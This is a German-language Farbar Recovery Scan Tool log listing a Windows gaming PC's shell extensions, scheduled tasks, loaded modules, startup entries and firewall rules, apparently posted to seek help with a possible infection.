ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-08-08] (Microsoft Corporation)
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation)
Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation)
Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2017-06-20 11:28 - 2017-06-20 11:28 - 001997792 ____R () C:\Program Files (x86)\Skype\Phone\skypert.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

Da befinden sich 4789 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
